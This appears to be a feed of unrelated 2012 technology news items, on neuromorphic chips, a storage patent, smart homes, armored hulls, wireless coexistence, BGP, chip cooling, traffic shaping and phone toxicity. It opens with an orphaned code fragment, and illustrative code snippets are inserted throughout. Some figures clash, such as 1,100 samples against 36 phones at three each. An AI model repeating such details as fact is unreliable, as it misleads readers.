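chips = 16
neurons_per_chip = 1_000_000
synapses_per_chip = 256_000_000
total_power_watts = 2.5          # figure quoted for the whole array

print(f"neurons:  {chips * neurons_per_chip:,}")     # 16,000,000
print(f"synapses: {chips * synapses_per_chip:,}")    # 4,096,000,000 (~4 billion)
print(f"power per chip: ~{total_power_watts / chips:.3f} W")
```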
TrueNorth was originally developed under the auspices of the Defense Advanced Research Projects Agency’s (DARPA) Systems of Neuromorphic Adaptive Plastic Scalable Electronics (SyNAPSE) program in collaboration with Cornell University.
Lawrence Livermore will collaborate on the technology with IBM Research, universities and other partners within the Department of Energy.
Neuromorphic computing will have a role in Lawrence Livermore's national security missions and could change how the lab does science, according to Jim Brase, deputy associate director for data science with Lawrence Livermore.
Microsoft has been granted a patent for what it calls "Virtually infinite reliable storage" that works across a distributed storage system. This system is basically a logical file system that distributes copies of files across various physical storage resources, creating essentially an infinite amount of storage so long as there are enough storage resources available, while providing the user a single consistent view of his or her data.
This allows the user to access their data from any location or computer. Data is associated with the user for as long as they want. It can be erased after a certain time, or when the user is removed from the system.
Distributed storage is usually just local storage moved to a server. If that drive goes down, there goes your data unless you have a backup from which to restore it. If you need more storage, you have to request it from IT.
Microsoft's patent is for a technology that allows for individual storage to grow automatically as more physical storage is added to the network. It will configure itself and show up as a new drive to the user with no client-side interaction required.
"From the user's point of view, a single seamless storage resource is provided across multiple volumes. The various volumes may be located on separate physical storage devices and may be associated with the same or different computers in a network. Regardless of where data is physically stored and which computer is being used, and even if it is offline from the network, from the user's point of view the aggregate storage is presented simply as a larger C: drive (for example)," Microsoft wrote in its patent filing.
The patent also covers making backup copies of data. The technology would replicate the file system and all file metadata onto secondary storage devices, allowing separate hard drives to act as backup systems. If a drive fails and the object has a replication level greater than one (meaning two or more backups), then the user will never know that the hard drive has failed or might not even be there, because the data exists elsewhere and was seamlessly moved into place.
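To make the idea concrete, here is a toy sketch of the pattern the patent describes: a single logical store that spreads copies of each object across several physical backends according to a replication level, so the loss of one backend is invisible to the user. This is an illustration of the concept only, not Microsoft's implementation.

```python
import hashlib

class LogicalStore:
    """Toy logical volume that replicates objects across physical backends."""

    def __init__(self, backends, replication_level=2):
        self.backends = backends                  # list of dicts standing in for physical drives
        self.replication_level = replication_level

    def _targets(self, key):
        # Pick `replication_level` distinct backends, deterministically per key.
        start = int(hashlib.sha256(key.encode()).hexdigest(), 16) % len(self.backends)
        return [self.backends[(start + i) % len(self.backends)]
                for i in range(self.replication_level)]

    def put(self, key, data):
        for backend in self._targets(key):
            backend[key] = data                   # write a copy to each chosen backend

    def get(self, key):
        for backend in self._targets(key):
            if key in backend:                    # any surviving replica will do
                return backend[key]
        raise KeyError(key)

# Three "drives"; losing any single one should be invisible to the user.
drives = [{}, {}, {}]
store = LogicalStore(drives, replication_level=2)
store.put("report.docx", b"quarterly numbers")
drives[0].clear()                                 # simulate a failed drive
print(store.get("report.docx"))                   # data still available from a replica
```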
The patent is entirely PC-centric. It requires a local storage system connected to the network, which in turn is connected to a cloud environment.
It's remarkable how slow the patent process can be. Microsoft submitted this patent for approval in 2005.
Note: This week and through Jan. 4 we are posting the top 10 posts of 2012. This post is #9 and was originally published March 15, 2012.
Today’s Internet of people is evolving into an “Internet of things”: soon there will be more than one trillion connected devices. By 2013, 1.2 billion connected consumer electronics devices are expected in the more than 800 million homes with broadband connections.
Imagine a home that is instrumented with sensors and actuators to control and optimize over the Internet your:
- Windows, doors, blinds, light switches
- Environment: heating, air conditioning
- Appliances: clothes washer & dryer, dishwasher
- Utility meters: water, electricity, gas
- Entertainment: TV, BD player, audio system
- Security: surveillance cameras
- Endless list of consumer products of the future
What makes a home smarter, rather than just smart?
IBM has defined three characteristics that distinguish this new generation of household devices: Instrumented, interconnected, and intelligent.
- Instrumented is the ability to sense and monitor changing conditions. Instrumented devices provide increasingly detailed information and control about their own functioning and also provide information about the environment in which they operate. For instance, a clothes washer can report information about the state of its components to support preventive maintenance for avoiding unforeseen outages. At the same time, it can sense its wash load to optimize its operation; it can send usage information to the manufacturer for data driven product innovation and it can be switched on by external signals when the energy cost is lowest.
- Interconnected is the ability to communicate and interact with people, systems, and other objects. Interconnected devices make possible remote access to information about a device and control of the device. This enables services to be delivered throughout the Internet, removing complexity from the home and lowering costs for the service providers. At the same time, it supports the aggregation of information and control of devices throughout the network. This means that consumers can get a consistent view of their devices, both from home and from mobile devices. For service providers, it provides an aggregate view of customer characteristics according to criteria such as geographic location, consumption patterns, or types of service.
- Intelligent is the ability to make decisions based on data, leading to better outcomes. Intelligent devices support the optimization of their use, both for the individual consumer and for the service provider. For instance, a utility can send signals to consumers’ homes to manage discretionary energy use in order to reduce peak loads. By coordinating this process throughout an entire service area, the utility can optimize the peak reduction, while saving the consumers money on their bills.
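To make the three characteristics above concrete, here is a minimal sketch of an instrumented, interconnected appliance using MQTT, a lightweight publish/subscribe protocol commonly used for connected devices. It assumes the paho-mqtt 1.x client library, and the broker address and topic names are hypothetical; the "intelligence" (deciding when to defer a wash cycle) would live in the cloud service that publishes the control messages.

```python
import json
import time
import paho.mqtt.client as mqtt  # assumes the paho-mqtt package is installed

BROKER = "broker.example-home-cloud.net"   # hypothetical cloud broker
STATUS_TOPIC = "home/42/washer/status"     # instrumented: the washer reports its state
CONTROL_TOPIC = "home/42/washer/control"   # intelligent: the cloud sends optimization signals

def on_control_message(client, userdata, message):
    command = json.loads(message.payload)
    if command.get("action") == "defer_start":
        # e.g. the utility signalled a peak-load period; wait for cheaper energy
        print(f"Deferring wash cycle by {command.get('minutes', 0)} minutes")

client = mqtt.Client()
client.on_message = on_control_message
client.connect(BROKER, 1883)
client.subscribe(CONTROL_TOPIC)            # interconnected: remote control from the cloud
client.loop_start()

# Periodically publish telemetry the manufacturer can use for preventive maintenance.
for _ in range(3):
    status = {"drum_temp_c": 41.5, "vibration": 0.02, "cycle": "rinse"}
    client.publish(STATUS_TOPIC, json.dumps(status))
    time.sleep(5)

client.loop_stop()
client.disconnect()
```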
Compared with previous attempts to enable the “smart home,” where the intelligence was based on centralized control through a home server or gateway, the intelligence and with it the complexity in the new smarter home is moved out from the home onto the network, or more precisely the Internet cloud.
This new paradigm creates opportunities for innovative services, which build on the computational power and scalability of the cloud, along with the collective consumer knowledge. Data that is aggregated and then stored within the cloud can provide dramatic new insights about consumer needs and behavior. Ultimately, this paradigm facilitates a host of possibilities, from radically improving the performance of current devices and services, to delivering consumer benefits that have not yet even been considered.
Cloud-based Service Delivery Platform (SDP) is the key in the smarter home
We are aware of the following key advantages of the SDP from the telecommunication world:
- Managing the complexity of service deployments means that third-party service providers can focus on the specific value they add, without having to acquire the skill or expend the capital to build a full-function service infrastructure.
- Using services oriented architecture and Web 2.0 technologies, the SDP enables collaboration for a more agile service creation.
- Common storefront technology enables service providers to integrate their business processes and store fronts for monetizing their services more efficiently.
Implementing the SDP concept in the cloud can revolutionize the ecosystem for the smarter home. Cloud computing technology creates an ideal environment for an intelligent, highly efficient, and highly flexible utility approach to services in the network. At the hardware infrastructure level, cloud computing enables the flexible, dynamic and low-touch provisioning of resources to applications. The creation of virtual service images supports the easy life cycle management and deployment of services. Finally, standardized web services interfaces to the services enable the dynamic composition of individual services into flexible solutions in a plug-and-play mode.
The cloud for managing the consumer services can extend directly into the home. A services “clone” can directly interact with services in the network, in effect becoming part of the cloud. This clone can function as a limited local replica of some services, delivering control even in the case of a network failure. It can also ease the connection of home devices to the network by translating protocols and acting as traffic concentrator. The ability to adapt any type of network and application protocols increases the choice of devices and services for consumers.
Cloud technology, whether in the form of software as a service (SaaS) or infrastructure as a service (IaaS), improves service management by speeding up time to market and lowering the cost of service management, resource management and life cycle management. It reduces resource costs by enabling more efficient allocation of fractional hardware resources to virtual service images. I think the most value will come from the business process as a service (BPaaS) form of cloud technology; one already finds a number of BPaaS offerings provided by various service providers, either as independent services or as value-added services to existing consumers.
Examples include surveillance services, medical monitoring services provided by some private clinics to elderly patients living alone at home, or entertainment services provided by TV program broadcasters.
Let’s explore the role of cloud-based entertainment services
In the entertainment industry, the cloud-based services provider model (broadband content services) is already driving major changes on the content delivery side: the business is moving from discrete content sales to a connected content services model. In parallel, interconnected smarter devices are moving the industry from a discrete product model to a connected devices model. Today, consumers expect their content on any screen and any device.
Yes, although the cloud and smarter devices help make content accessible on any screen and device, and keep it economical, scalable, and secure, industry standards are equally important. New standards such as Hybrid Broadcast Broadband TV (HbbTV) aim to create an open and business-neutral technology platform that seamlessly combines TV services delivered by broadcast with services delivered by broadband, and also enables access to Internet-only services for consumers using connected TVs and set-top boxes. The HbbTV specification is based on existing standards and web technologies including Open IPTV Forum (OIPF), CEA, DVB, and W3C, and it provides the features and functionality required to deliver feature-rich broadcast and Internet services.
Yes, the cloud is indeed an enabler for the smarter home: it absorbs highly fluctuating computing needs, provides flexible service management, and enables remote access and real-time monitoring of cloud-based services. To meet consumer expectations of the smarter home, continued development of industry standards is important, and the good news is that the various industry participants are working hard to develop the required standards. I think that within the next year or two the Internet of things will be a normal way of life, because today's Internet of people and cloud technology will play a key enabling role.
Army to Strengthen Ground Combat Vehicles
The U.S. Army Research Laboratory has collaborated with Alcoa, the world’s third largest producer of aluminum, in order to come up with a way to better protect soldiers from improvised explosive devices (IEDs). The solution that they decided on is a single-piece aluminum hull designed for ground combat vehicles. This hull not only makes ground vehicles more durable, but lighter and cheaper as well.
"For decades, the Army has recognized the survivability benefits of a single-piece hull due to its thickness, size and shape for ground combat vehicles," said Dr. Ernest Chin of the Army Research Laboratory. "Our collaborative effort to develop continuous and seamless aluminum hull technology has the potential to be a game changer for how combat vehicles are designed and made to better protect our soldiers."
The new aluminum hull would improve the performance of combat vehicles in four major ways, the first being improved blast protection.
The combat vehicles are usually manufactured with welded seams but with the new hull those seams would be completely eliminated, thus improving the durability and protection of the vehicle.
The aluminum hull also increases damage resistance: if an enemy attempts to destroy a combat vehicle, the chances of success are reduced. The Alcoa alloys are more blast-absorbent and reduce the damage taken.
The design of the hull is also more efficient than before with a reduction in weight. This weight reduction brings about the fourth benefit of the aluminum hulls – cost savings. Due to the weight reduction, fuel efficiency will be enhanced, assembly time reduced, and complexity diminished.
“Alcoa has helped the U.S. military stay ahead of emerging threats by innovating durable, lightweight aluminum technologies since World War I,” said Ray Kilmer, Alcoa Executive Vice President and Chief Technology Officer. “Our experts are now developing the world’s largest, high-strength aluminum hull for combat vehicles to better defend against IEDs, the greatest threat our troops face in Afghanistan, while meeting the Army’s affordability needs.”
The program was initiated after Alcoa was able to model significant performance advantages of the new and improved hull. Not only should it provide more protection from IEDs, but also from other modern-day military threats.
Researchers at the University of Michigan have invented a way for different wireless networks crammed into the same space to say "excuse me" to one another.
Wi-Fi shares a frequency band with the popular Bluetooth and ZigBee systems, and all are often found in the same places together. But it's hard to prevent interference among the three technologies because they can't signal each other to coordinate the use of the spectrum. In addition, different generations of Wi-Fi sometimes fail to exchange coordination signals because they use wider or narrower radio bands. Both problems can slow down networks and break connections.
Michigan computer science professor Kang Shin and graduate student Xinyu Zhang, now an assistant professor at the University of Wisconsin, set out to tackle this problem in 2011. Last July, they invented GapSense, software that lets Wi-Fi, Bluetooth and ZigBee all send special energy pulses that can be used as traffic-control messages. GapSense is ready to implement in devices and access points if a standards body or a critical mass of vendors gets behind it, Shin said.
Wi-Fi LANs are a data lifeline for phones, tablets and PCs in countless homes, offices and public places. Bluetooth is a slower but less power-hungry protocol typically used in place of cords to connect peripherals, and ZigBee is an even lower powered system found in devices for home automation, health care and other purposes.
Each of the three wireless protocols has a mechanism for devices to coordinate the use of airtime, but they all are different from one another, Shin said.
"They can't really speak the same language and understand each other at all," Shin said.
Each also uses CSMA (carrier sense multiple access), a mechanism that instructs radios to hold off on transmissions if the airwaves are being used, but that system doesn't always prevent interference, he said.
The main problem is Wi-Fi stepping on the toes of Bluetooth and ZigBee. Sometimes this happens just because it acts faster than other networks. For example, a Wi-Fi device using CSMA may not sense any danger of a collision with another transmission even though a nearby ZigBee device is about to start transmitting. That's because ZigBee takes 16 times as long as Wi-Fi to emerge from idle mode and get the packets moving, Shin said.
Changing ZigBee's performance to help it keep up with its Wi-Fi neighbors would defeat the purpose of ZigBee, which is to transmit and receive small amounts of data with very low power consumption and long battery life, Shin said.
Wi-Fi devices can even fail to communicate among themselves on dividing up resources. Successive generations of the Wi-Fi standard have allowed for larger chunks of spectrum in order to achieve higher speeds. As a result, if an 802.11b device using just 10MHz of bandwidth tries to tell the rest of a Wi-Fi network that it has packets to send, an 802.11n device that's using 40MHz may not get that signal, Shin said. The 802.11b device then becomes a "hidden terminal," Shin said. As a result, packets from the two devices may collide.
To get all these different devices to coordinate their use of spectrum, Shin and Zhang devised a totally new communication method. GapSense uses a series of energy pulses separated by gaps. The length of the gaps between pulses can be used to distinguish different types of messages, such as instructions to back off on transmissions until the coast is clear. The signals can be sent at the start of a communication or between packets.
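As a rough illustration of the idea (not the researchers' actual implementation), the Python sketch below encodes a handful of message types as gap lengths between two energy pulses and classifies a measured gap back into a message; the specific gap values and tolerance are invented for the example.

    GAP_CODEBOOK_US = {   # gap length in microseconds -> meaning (values invented)
        200: "back off: transmission pending",
        400: "wide-band sender present",
        600: "wake-up preamble",
    }

    def encode(message):
        """Return a pulse/gap/pulse schedule carrying one message."""
        for gap, meaning in GAP_CODEBOOK_US.items():
            if meaning == message:
                return ["pulse", ("gap_us", gap), "pulse"]
        raise ValueError("unknown message")

    def decode(measured_gap_us, tolerance_us=50):
        """Classify a measured gap by the nearest codebook entry."""
        nearest = min(GAP_CODEBOOK_US, key=lambda g: abs(g - measured_gap_us))
        if abs(nearest - measured_gap_us) <= tolerance_us:
            return GAP_CODEBOOK_US[nearest]
        return "unrecognized"

    print(encode("wake-up preamble"))
    print(decode(412))   # -> "wide-band sender present"

Because the receiver only has to detect energy and measure silence, even a narrowband or low-power radio can read a message sent by a faster, wider-band neighbor.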
GapSense might noticeably improve the experience of using Wi-Fi, Bluetooth and ZigBee. Network collisions can slow down networks and even cause broken connections or dropped calls. When Shin and Zhang tested wireless networks in a simulated office environment with moderate Wi-Fi traffic, they found a 45 percent rate of collisions between ZigBee and Wi-Fi. Using GapSense slashed that collision rate to 8 percent. Their tests of the "hidden terminal" problem showed a 40 percent collision rate, and GapSense reduced that nearly to zero, according to a press release.
One other possible use of GapSense is to let Wi-Fi devices stay alert with less power drain. The way Wi-Fi works now, idle receivers typically have to listen to an access point to be prepared for incoming traffic. With GapSense, the access point can send a series of repeated pulses and gaps that a receiver can recognize while running at a very low clock rate, Shin said. Without fully emerging from idle, the receiver can determine from the repeated messages that the access point is trying to send it data. This feature could reduce energy consumption of a Wi-Fi device by 44 percent, according to Shin.
Implementing GapSense would involve updating the firmware and device drivers of both devices and Wi-Fi access points. Most manufacturers would not do this for devices already in the field, so the technology will probably have to wait for hardware products to be refreshed, according to Shin.
A patent on the technology is pending. The ideal way to proliferate the technology would be through a formal standard, but even without that, it could become widely embraced if two or more major vendors license it, Shin said.
BGP multi-homing has become as necessary to networks connected to the Internet as redundant power sources or multiple data centers. No business can afford prolonged outages, and the first and surprisingly most effective way to maximize uptime is a robust BGP implementation to multiple transit providers. BGP uses Autonomous System Numbers (ASNs), which are assigned to individual networks or relatively large network segments. An "AS hop" is defined as a transition from one AS to another. BGP assumes that, for any given destination, the route with the fewest AS hops is preferable. In addition to this dynamic information, BGP allows administrators to define static path preferences using weights, local preferences, MEDs, and so on.
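A simplified Python sketch of that decision logic shows how a statically configured local preference overrides the AS-hop count; real BGP implementations apply several additional tie-breakers (MED, origin, router ID) that are omitted here, and the ASNs below are illustrative private-range values.

    routes_to_prefix = [
        {"next_hop": "provider_a", "as_path": [64501, 64510, 64620], "local_pref": 100},
        {"next_hop": "provider_b", "as_path": [64502, 64620],        "local_pref": 100},
        {"next_hop": "provider_c", "as_path": [64503, 64530, 64620], "local_pref": 200},
    ]

    def best_path(routes):
        # Higher local preference wins first; a shorter AS path only breaks ties.
        return max(routes, key=lambda r: (r["local_pref"], -len(r["as_path"])))

    print(best_path(routes_to_prefix)["next_hop"])  # provider_c, despite its longer AS path

Note that nothing in this selection looks at latency, loss, or congestion, which is exactly the limitation discussed next.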
BGP routing information is therefore largely based on AS hops and manually configured static preferences. BGP has no capability to discover any other performance characteristics. As a result, metrics such as packet loss, latency, throughput, link capacity and congestion, historical reliability, and other business characteristics are not addressed by the protocol, and routers relying on BGP cannot make dynamic, performance-optimized decisions.
Settlement-free peering and best-effort traffic delivery are vital for the efficiency and relatively low cost of operating and connecting to the Internet. Best-effort delivery, however, has its flaw: congestion. Congestion occurs because of port oversubscription at some transit providers, DDoS attacks, daily traffic peaks, and even congested public traffic exchanges. Other problems are caused by BGP's inherent trust between peering partners. This implied trust means that all route updates are considered valid and are treated as such. However, due to convergence delay, misconfiguration, external protocol interaction, and many other reasons, not all updates are valid. In the worst cases, invalid updates can lead to routing loops or blackouts. Blackouts happen when an outage occurs in a transit provider's network while the upstream provider still announces the routes to its customers, making them send traffic into a black hole. If the blackout is total, network engineers will notice it and shut down the BGP session. A partial routing blackout is hard to diagnose and troubleshoot because of routing asymmetry in the Internet.
Since BGP is focused on reachability and its own stability, traffic may only be rerouted after hard failures, that is, total losses of reachability as opposed to degradation. This means that even if service is so degraded that it is unusable for an end user, BGP will continue to treat a degraded route as valid unless the route is invalidated by a total loss of reachability. As a dynamic routing protocol, BGP is, unfortunately, reactive only in cases of total failure.
Multi-homing avoids downtime by providing redundancy; however, it does not address the performance and congestion-related problems that occur in the "middle mile" linking backbone networks. Simple BGP multi-homing is therefore not enough.
With increasing electronic miniaturization and the growing density of the chips running such devices, heat is a mortal enemy of the power and scalability of modern systems.
DARPA today announced a program called Intrachip/Interchip Enhanced Cooling (ICECool) that it hopes will go to the heart of such heat problems by building chips with a drastically different way of cooling: what the agency calls microfluidic channels inside the chip or component, which will dissipate heat more effectively than current cooling technologies.
"Think of current electronics thermal management methods as the cooling system in your car," said Avram Bar-Cohen, DARPA program manager in a statement. "Water is pumped directly through the engine block and carries the absorbed heat through hoses back to the radiator to be cooled. By analogy, ICECool seeks technologies that would put the cooling fluid directly into the electronic 'engine'. In DARPA's case this embedded cooling comes in the form of microchannels designed and built directly into chips, substrates and/or packages as well as research into the thermal and fluid flow characteristics of such systems at both small and large scales."
At its core, ICECool will explore disruptive thermal technologies that will mitigate thermal limitations on the operation of military electronic systems, while significantly reducing size, weight, and power consumption, DARPA stated. These thermal limitations will be alleviated by integrating thermal management techniques into the chip layout, substrate structure, and/or package design, which will significantly shrink the dimensions of the cooling system and provide superior cooling performance. Successful completion of this program will close the gap between chip-level heat generation density and system-level heat removal density in high-performance electronic systems, such as computers, wireless electronics and solid-state lasers.
DARPA says the need for such technology arises because the increased density of electronic components and subsystems, including the nascent commercialization of 3D chip-stack technology, has pushed package-level volumetric heat generation "beyond 1 kW/cm3." Despite the application of aggressive thermal management techniques at the cabinet, module, and board levels, reliance on heat spreading to external heat-rejection surfaces, through convoluted and multi-layered junction-to-ambient heat transfer paths, has led to a growing gap between the typical volumetric heat rejection capability of defense electronic systems and chip-level heat generation. The specific goal of ICECool Fundamentals is to demonstrate chip-level heat removal in excess of 1 kW/cm2 heat flux and 1 kW/cm3 heat density.
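A back-of-the-envelope energy balance, q = m_dot * c_p * delta_T, gives a feel for what the 1 kW/cm2 target implies for an embedded water channel; the 40 K allowable coolant temperature rise assumed below is chosen only for illustration.

    q_watts   = 1000.0   # heat to remove per square centimetre of chip area
    c_p_water = 4186.0   # J/(kg*K), specific heat of liquid water
    delta_t   = 40.0     # K, assumed allowable coolant temperature rise

    m_dot = q_watts / (c_p_water * delta_t)   # kg/s of water needed per cm^2
    litres_per_minute = m_dot * 60.0          # roughly 1 litre per kg for water

    print(f"{m_dot * 1000:.1f} g/s, about {litres_per_minute:.2f} L/min per cm^2")
    # ~6 g/s: roughly a third of a litre of water per minute forced through
    # microchannels under every square centimetre of silicon.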
The ICECool program is a follow-on to another DARPA initiative, the Thermal Management Technologies initiative, which looks to develop all manner of advanced heat management technologies. For example, its Thermal Ground Plane program is looking to develop high-performance spreaders to replace the copper alloy heat spreaders in conventional systems. The Microtechnologies for Air Cooled Exchangers (MACE) program develops enhanced heatsinks with improvements that reduce the thermal resistance and also reduce the power requirements for the fan in air-cooled systems. And the Active Cooling Module (ACM) program develops miniature, active, high-efficiency refrigeration systems based on thermoelectric or vapor-compression technologies.
Intelligent broadband networks and fair share for subscribers
The challenges facing today's broadband network are a result of technical and business decisions made early in the evolution of public data networks. There is a constant contention between users and operators, applications and networks, as well as regulation and flexibility.
Today's broadband service providers are exploiting the latest application and user-aware, policy-based network management systems to ensure that every user receives their fair share of bandwidth.
In the beginning
Since the dawn of the information age, voice — and later data — has been delivered over shared networks. The public switched telephone network (PSTN) was built with more access points (phones) than actual switching capacity. Operators designed their networks based on realistic peak usage and invented mathematics (e.g., Erlang distribution) to help them model for peak times.
The PSTN was managed with call admission control - a call was not admitted to the network unless end-to-end capacity existed to handle it. This was a perfectly acceptable management model for voice circuit-switched calls, but it would not hold up in a modern network with today's voice and data demands.
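The Erlang B formula captures that provisioning math: given the offered traffic in erlangs and the number of circuits, it returns the probability that a new call is blocked. A small Python version, using the standard recursive form, might look like this (the traffic figures are illustrative):

    def erlang_b(offered_erlangs, circuits):
        """Blocking probability for `offered_erlangs` of traffic on `circuits` trunks."""
        b = 1.0
        for m in range(1, circuits + 1):
            b = (offered_erlangs * b) / (m + offered_erlangs * b)
        return b

    # Example: 90 erlangs of busy-hour demand offered to 100 trunks.
    print(f"probability a new call is blocked: {erlang_b(90, 100):.3%}")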
Data access emerged
Data access brought a new complexity to the network. Access to data or network resources was no longer determined by slow, human-driven needs such as making a phone call. The destinations for voice and data grew exponentially, and so did the number of paths.
Managing this data network became even more complex when applications converged onto one network. Networks experienced the stress of the triple-play, converged voice, data and video being delivered over one pipe to a vast number of destinations.
The emergence of new applications, each with unique quality and timeliness guarantees, added another dimension and complexity to the network. An admission control model was no longer sufficient. The end-to-end network changed dynamically with mobile IP and other applications competing for the same limited bandwidth.
Traffic management was born
In the earliest days of consumer data access, traffic optimization was given little priority. Congestion was straightforward and limited to number of ports and switching capability on the PSTN.
As dial-up access matured, subscribers used prioritized PSTN lines for their modems. This caused conflict in dial-up access equipment and phone switches. Content started to move from proprietary forums to the Web, and broadband emerged as a new means to increase capacity and lower cost for providers.
The introduction of cable and DSL broadband access meant that Internet access grew more mainstream and users developed an always-on behavior. As a largely client-server paradigm, users consumed content that was generated by grassroots publishing. The term user-generated content did not yet exist, and at the time was limited to e-mail.
Soon enough, tech-savvy users with fast computer hardware discovered how to make digital copies of music and learned to 'rip' music from compact discs. Then music sharing grew to meet the digital age with new peer-to-peer (P2P) technology that powered free music sharing sites like Napster. As Napster and other file-sharing networks such as Gnutella, Kazaa and WinMX emerged and grew in popularity, bandwidth rates per subscriber soared.
Broadband service providers added access capacity as fast as possible to meet subscriber growth and implemented access limits on the TCP port numbers used by these bandwidth-intensive applications.
Millions of new subscribers around the world connected to the Internet. Drawn by popular applications such as P2P file sharing, voice-over-IP (VoIP) services like Skype, online gaming and digital media such as YouTube, bandwidth consumption absolutely soared.
With a growing number of applications, each with its own unique characteristics and delivery demands competing for available bandwidth, packets were easily dropped and quality of service (QoS) suffered. As a result, a very small number of users could cause quality problems for a wide range of popular applications.
With quality of service being threatened, service providers invested in intelligent network tools to get a better understanding of subscriber and application traffic on their networks. Network intelligence was the first step in balancing the competing network demands and establishing reasonable network management practices.
Models of traffic optimization
As broadband adoption continued to grow worldwide, service providers started to leverage their policy-management infrastructure to improve operational efficiencies in areas such as network security. Traffic optimization remained relatively static as long as the service provider left sufficient capacity for consumers to access the content they wanted.
However, the rise of mobile data also meant increasingly expensive and scarce access resources were being shared by unknown and varying numbers of users. In response, service providers added user-based management technologies to ensure fairness and provide a consistent quality of experience (QoE) for all users.
MODELS CURRENTLY IN USE
Application-based traffic optimization uses the properties of each network protocol to provide the minimum bandwidth that guarantees acceptable quality. Bulk file transfer applications are given the lowest priority since they are typically non-interactive and long-lived. For example, a one-way bulk non-interactive application, such as a file download, is lowest priority, while one-way streaming media, such as YouTube, may be next in priority, and an interactive application such as VoIP has the highest priority. As the network becomes heavily congested, this prioritization becomes important, because without it every application is degraded. Application-based optimization delivers excellent overall quality and subscriber satisfaction.
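A toy Python sketch of this model, with an invented application-class list, maps each recognized class to a priority so that a congested scheduler serves interactive traffic first and bulk transfers last.

    APP_PRIORITY = {
        "voip":            0,  # interactive: highest priority
        "online_gaming":   1,
        "streaming_video": 2,  # one-way streaming media
        "web_browsing":    3,
        "bulk_transfer":   4,  # long-lived, non-interactive: lowest priority
    }

    def classify(flow):
        """Map a flow record to a priority; unknown traffic gets a middle value."""
        return APP_PRIORITY.get(flow.get("app"), 3)

    flows = [{"app": "bulk_transfer"}, {"app": "voip"}, {"app": "streaming_video"}]
    for flow in sorted(flows, key=classify):
        print(flow["app"])  # order served under congestion: voip, streaming, bulk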
User-based traffic optimization is measured over relatively short time periods. This model gives the service provider a strong tool to ensure consistent quality on an individual subscriber basis. However, a strictly user-based model can be unfair to the heaviest users, as their traffic is indiscriminately treated regardless of the application they are using. A better solution would be to combine application and user-based models, allowing users to maintain their overall bandwidth behavior and control which applications are affected during periods of congestion.
Application- and user-based:
In this method, access to bandwidth is given to both the service provider and the end-user. The provider enforces user-to-user fairness allocation, and the end-user controls how their individual traffic operates within that allocation. For example, a user may wish to prioritize their VPN access higher than their HTTP, while another user may choose online gaming as their top priority. During periods of network congestion, the application- and user-based model ensures one end-user's prioritized application does not overly impact another's.
This traffic optimization model would increase subscriber satisfaction by offering personalized service, allowing end-users more control over their own priorities. This model may involve a 'quota' of QoS points or be presented as a Web page, which gives specific weightings per application or per application class. There would be no change in billing plans to operate this service, which makes it very feasible with today's technology and consumer education level. This model is optimal because it provides a network-neutral and consumer-transparent sharing of bandwidth.
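One way to picture the combined model is a two-level allocation: the operator splits capacity evenly across subscribers, and each subscriber's own weights split that share across applications. The Python sketch below uses invented subscriber names and weights and is only illustrative.

    def allocate(total_kbps, subscribers):
        per_user = total_kbps / len(subscribers)  # operator-enforced user-to-user fairness
        plan = {}
        for name, app_weights in subscribers.items():
            weight_sum = sum(app_weights.values())
            plan[name] = {app: per_user * w / weight_sum  # user-chosen priorities
                          for app, w in app_weights.items()}
        return plan

    subscribers = {
        "alice": {"vpn": 3, "http": 1},          # Alice prioritizes her VPN traffic
        "bob":   {"gaming": 2, "streaming": 2},  # Bob splits his share evenly
    }
    print(allocate(10000, subscribers))

However Alice weights her own traffic, Bob's share is untouched, which is the neutrality property the model is after.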
BACK TO THE FUTURE
Internet traffic optimization has come a long way from the early days of dial-up access, both in terms of demand and complexity. End-user controls provide an enforced inter-user fairness that gives subscribers the ability to prioritize their applications as they see fit - effectively removing any bias that the service provider may impose upon applications.
Once traffic optimization reaches the stage where both the needs of the end-user and the needs of the operator are effectively balanced, traffic optimization will evolve once again. The new model may resemble an economic free market form that ensures fairness through the alignment of every party's interests. Transparency will be the overriding factor in determining the best possible network solution in all circumstances where quality of experience is concerned.
The battle between Apple's iPhone 5 and Samsung's Galaxy S III rages on -- a study conducted by the disassembly firm iFixit and nonprofit organization Ecology Center has concluded that the iPhone 5 is less toxic than the Galaxy S III smartphone.
The study, which measured the levels of hazardous chemicals in smartphones, placed the iPhone 5 in fifth place with a score of 2.8 out of 5, and the Galaxy S III in ninth place with a score of 3.0. Both phones were outranked by Motorola's Citrus, which took the top spot, followed by LG's Remarq, the iPhone 4S and the Samsung Captivate.
The study's goal was to identify the environmental friendliness of smartphones, and to check the levels of hazardous substances that could be potentially damaging to the environment and human health. IFixit and Ecology Center disassembled 36 mobile phones released in the last 5 years, and tested for 35 substances including chlorine, mercury, lead, arsenic, chromium, cobalt, copper, nickel and cadmium. Tests were conducted on cases, processors, buttons, circuit boards, screens and other hardware. Results of the study are available on Ecology Center's HealthyStuff.org website.
The new iPhone 5 is a big improvement over the original iPhone, which was released in 2007 and has been rated the most toxic in the study. Also among the most toxic phones are the Nokia N95, which also shipped in 2007, and Research In Motion's BlackBerry Storm 9530, which shipped in 2008.
Every phone contained at least lead, bromine, chlorine, mercury and cadmium, according to the study. The Samsung Galaxy S III and iPhone 5 contained some lead and mercury.
The study was based on 1,100 samples of smartphones, with three for each brand, said Jeff Gearhart, research director at Ecology Center.
The goal was to point out the environmental friendliness of the smartphones, Gearhart said. The effects of hazardous materials could linger for years, and a wide range of contaminants could show up in air or soil years after smartphones are discarded.
It is critically important that smartphones are properly recycled to limit the effects of hazardous materials, Gearhart said. Smartphones tend to be chemically intensive, but the mobile industry is making great progress in reducing hazardous chemicals.
Part of the improvement in the smartphones comes through removal of hazardous substances. More smartphones are using cables free of polyvinyl chloride (PVC), mercury-free LCD displays and arsenic-free glass. Environmental organizations like Greenpeace regularly carry out tests to check computers for PVC plastic and brominated flame retardants (BFRs). PC makers like Apple, Hewlett-Packard and Dell have been reducing the use of PVC plastic and BFRs in computers in an effort to go green.
Electronics companies are producing cleaner smartphones, but the use of toxic chemicals needs to be discouraged through better regulation, Gearhart said. In 2003, the European Union adopted the ROHS (Restriction of Hazardous Substances Directive), which restricts hazardous substance use in electronics. Efforts are also underway in the U.S. to restrict the use of toxic chemicals in electronics.
There are also ongoing concerns around consumers dumping toxic electronics in waste, which could eventually hurt the environment. Some nonprofit organizations such as Basel Action Network are encouraging recycling and chasing down organizations that send electronics to developing countries, where the products are burned instead of recycled.
A study by the U.N. in 2010 revealed that the e-waste generated by PCs, consumer electronics and appliances would grow by 2020. Discarded mobile phone e-waste in 2020 will be about 18 times higher in India than the 2007 levels and seven times higher in China.
But electronics companies are offering instructions on how products can be recycled for free. Wireless carrier T-Mobile includes return labels in some smartphones so the products can be sent free of cost to recycling centers.
